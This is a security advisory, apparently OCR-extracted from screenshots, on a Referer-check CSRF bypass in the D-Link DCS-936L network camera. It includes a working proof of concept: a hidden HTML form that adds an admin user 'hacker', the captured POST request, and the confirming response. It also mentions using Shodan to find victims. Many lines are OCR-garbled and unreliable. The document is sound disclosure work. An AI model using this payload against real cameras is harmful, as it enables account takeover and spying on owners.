Qualys Security Advisory QSA-2017-03-26 


March 26, 2017 


D-Link Network Camera DCS-936L_ Weak CSRF Protection Vulnerability 


SYNOPSIS: 
D-Link DCS-936L camera implements CSRF protection which can be bypassed easily. 
Reference:- http://us.dlink.com/product-category/home-solutions/view/network-cameras 


CVE: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-7851 


VULNERABILITY DETAILS: 
Lab Setup: 


1. Target Camera: D-Link DCS-936L with latest firmware version 1.02.01 
2. Target IP Address: 192.168.100.6 

3. Site Hosting CSRF page: http://174.138.67.126 

4. CSRF URL: http://174.138.67.126/192.168.100.6.html 


Vulnerable/Tested Version: 
D-Link DCS-936L running firmware version 1.02.01 is affected. Other models may also be affected. 


Vulnerability: Cross-Site-Request-Forgery (CSRF) Bypass 


D-Link DCS-936L prevents CSRF attack by looking at ‘Referer’ header. The ‘Referer’ IP should match 
with the one in ‘HOST’ header. If it does not, HTTP 403 is returned in the response. 


However, this device does not perform a strict check on ‘Referer’ header. It seems that it looks for the 
device’s IP address (which is the one in ‘HOST’ header) anywhere in the ‘Referer’ header. If found, it 
happily accepts the request. 


An unauthenticated, remote attacker could host a malicious site that makes requests to the victim’s device 
without having credentials. 


Risk Factor: Low 


Impact: 


If a victim is logged into camera’s web console and visits a malicious site hosting a 
<Target_Device_IP.HTML> from another tab in the same browser, the malicious site can send requests to 


victim’s device. An attacker can add a new user, replace the firmware with malicious one or connect victim’s 
device to rogue Wireless Network. 


Note: An attacker can easily find out public IP address of victim’s device on Shodan or similar search engines 
to create <Target_Device_IP.HTML> file 


CVSS Score: AV: N/AC: M/AU: N/C:C/I: C/A:C 


Proof-Of-Concept: 
1. Attacker hosts a ‘192.168.100.6.html’ on 174.138.67.126 
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100.6.html" 20L, 503C written 


Note: This request can be sent over HTTPS. The only reason I am sending it over HTTP is to avoid 
Browser’s warning for BurpSuite Proxy. 


2. Victim logs into his device. 


€ | ® | 192.168.100.6/eng/mainFrame.cgi?nav=Status# C @ Q. Search O 


INT ` = & SQL- XSS- Encryption: Encodingy Other- 


q) Load URL 
Ñ Split URL 
, Execute 


[C Enable Post data [[] Enable Referrer 
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Device Info 


+09 All of your network connection details are displayed on this page. The firmware version is also 


INFORMATION 


Camera Name DCS-936L 

Time & Date 2016/1/1 01:53:01 
Firmware Version 1.02.01 

Hardware Version A 

Agent Version 2.1.0-b11 

MAC Address BO:C5:54:3B:23:90 
IPv4 Address 192.168.100.6 


3. Victim then visits attackers site http://174.138.67.126/192.168.100.6.html 


D-LINK CORPORATION | WIRE... X New Tab x + 
# Q Search 
INT `> = @ SQL- XSS- Encryptiony Encoding» Other- 
@ Load URL 
Ü Split URL 
>) Execute 


[C] Enable Postdata [[] Enable Referrer 


4. Above request adds a new user ‘Hacker’ which reboots the web server. 


D-LINK CORPORATION | WIRE... ><  http://192.168.…tools admin.cgi X + 


€ © 192.168.100.6/en g/admin/tools_admin.cgi 
INT ` = & SQL- XSS- Encryptiony Encodingy Other- 
4s) Load URL 
Ü Split URL 
, Execute 


[C] Enable Post data [|] Enable Referrer 


Here you can change the administrator's password for your account as well as add and/or delete user 
account(s). You can also configure a unique name for your camera, and enable its OSD (On-Screen 
Display) feature in order to display camera name and time stamp for both live video and recordings of 
your camera. 

Changes saved. 

Camera Web Server is currently restarting, please wait 18 seconds. 


ADMIN PASSWORD SETTING 


Old Password 30 characters maximum 
New Password 30 characters maximum 


Confirm New Password 


ADD USER ACCOUNT 


User Name 30 characters maximum 
New Password 30 characters maximum 
Confirm New Password 


Add 20 users maximum 


5. Request in BurpSuite: 


http://192.168.100.6 Jeng/admin/tools_admin.cgi w D [J 192.168.100.6 
http://192.168.100.6 GET /eng/admin/tools_admin.xsl O O 304 250 xsl © 192.168.100.6 
http://192.168.100.6 GET /eng/js/jquery.js B G 304 257 script js LO 192.168.100.6 
http://192.168.100.6 GET — /eng/js/make js = O 304 27 script js [J 192.168.100.6 
http://192 168.100.6 GET m/eng/js/ajax js B 304 256 script js L) 192.168.100.6 
http://192.168.100.6 GET /eng/js/frameAutoSize js = O 34 27 script js CO 1924684006 
http://192.168.100.6 GET /eng/js/public js D EO 34 27 script js [J 1924684006 
http://192.168.100.6 Jeng/js/admin js Ü G) 304 257 LJ 192.168.100.6 
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[Ras | Headers | Hex | HTML | Render 


Server: Apache/2.2.22 (Ubuntu) 


ETag: "20255-1£7-54b9ec40c5e90" 
Accept-Ranges: bytes 

Vary: Accept-Encoding 
Content-Length: 503 

Connection: close 
Content-Type: text/html 


<html> 
<body> 
<form id="CSRF" action="http://192.168.100.6/eng/admin/tools_admin.cgi" method="POST"> 
<input type="hidden" name="user" value="hacker"> 
<input type="hidden" name="action" value="set"> 
<input type="hidden” name="passvord" value="abc123"> 


Browser sends add new user request to the target device 192.168.100.6. 
Referer header is set to http://174.138.67.126/192.100.6.html . As this contains the IP address of the device 
(192.168.100.6), this request is processed successfully. 
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Filter: Hiding CSS, image and general binary content 


Host Method | URL Params Edited | Status |Length | MIME t... | Extension 
14595 http://192.168.100.6 GET  /js/public.js D 44 263 HIM js 
4596 http://174.138.67.126 GET n/192468.100.6.html S 200 780 HTML html 


1598 —http://192.168.100.6 /eng/admin/tools_admin.xsl 304 250 xsl 
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POST /eng/admin/tools admin.cgi HTTP/1.1 
Host: 192.168.100.6 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.D 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http://174.138.67.126/192.168.100.6.html 

Cookie: language=eng; usePath=null 

Authorization: Basic YWRtaW4éYWJJMTIz 

Connection: close 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 61 


user=hacker éaction=set &password=abc123 éconfirmPassword=abc123 


Server response shows user hacker added successfully: 
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1596 http://174.138.67.126 GET /192468.100.6.html 
1597. hittp://192.168.100.6 — POST /eng/admin/tools_admincgi = Ë) (J 200 8501 XML egi í 
1598 http://192.168.100.6 /eng/admin/tools_admin.xsl O 304 250 xsl 
1601 http://192.168.100.6 /eng/js/jquery js O 304 257 script js 
1602 http://192.168.100.6 /eng/js/make.js O 304 257 script js 
256 script js 
O 304 257 script js 
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<user> 
<name>admin</name> 
</user> 
</Administrators> 
<Users> 
<max>20</max> 
<size>1</size> 
<user> 
<name>hacker</ name> 
</user> 

</Users> 
<ethOIpv4Addr>192.168.100.6</ethOIpv4Addr> 
</contig> 

</root> 


fra ele) LS) [hacked 


D-LINK CORPORATION | WIRE... >< http://192.168....tools_admin.cgi X + 


é G 192.168.100.6/eng/admin/tools admin.cgi 
INT ` æ & SQL- XSS- Encryptiony Encodingy Other- 
gg Load URL 
Ü Spit URL 
, Execute 


[C] Enable Post data [ | Enable Referrer 
pave 


ADD USER ACCOUNT 


User Name 30 characters maximum 


New Password 30 characters maximum 


Confirm New Password 


Add | 20 users maximum 


USER LIST 


User Name 


AUTHENTICATION 


RTSP Authentication 
HTTP Authentication 


Snapshot URL Authentication 


(http://192.168.100.6/image/ipeg.cai) 
Save 


DEVICE SETTING 


Camera Name 36 characters maximum 


8. Attacker can now log into the device as hacker/abc123 


e € hitp://192.168,100.6/eng/liveView.cgi?nav=Live 2 ~ ó | & D-LINK CORPORATION | W... w is @ 


Product: DCS-936L Firmware Version: 1.02 


This section shows your camera's live video. You can control your settings using the buttons below. 
Current resolution is x 


== 


[Logout | 


Please select a 


DOM Explorer Console # 1 Debugger Network >) Pertormance Memory Emulation 
= M W Mm & 2? = Y Content type Find (Ctrl+F) 
Name/ Resutt / K > Initiator / 5 Headers Body Parameters Cookies Timings 
Path Protocol Method Description Content type Received Time Type ms 
= ç Request URL: http://192.168.100.6/eng/liveView.cgi?n... 
liveView.cgi?nav=Live HTIP GET 200 text/xml 629,28 ms document S 6 
http://192.168.100.6/eng/ OK A st Method: GET 
liveView.xsl HTTP GET 304 text/xsl (from cache) 1097 ms  parsedElement Status Code: H 200 / OK 
http.//192.168.100,6/eng, Not Modified 
4 
basic.css HTTP GET 200 text/css (from cache) Os EET 
http://192.168.100.6/eng, OK Accept: text/html, application/xhtml+xml, image/jxr, */* 
liveView.css HTTP GET 200 text/css (from cache) Os coding: gzip, deflate 
http://192.168.100,6/eng/ OK 
Ac gaera 
icons.css HTTP GET 200 text/css (from cache) — Os ne T 
httpy//192.168,100,6/eng, OK Au 


ion: Basic aGFja2VyMTphYmMxMjM= L a 


ajaxjs HTTP GET 200 text/javascript (from cache) Os ction: Keep-Alive 


HTTP GET 200 text/javascript (from cache) Os ka akies language=eng 


nw œ Host: 192.168.100.6 
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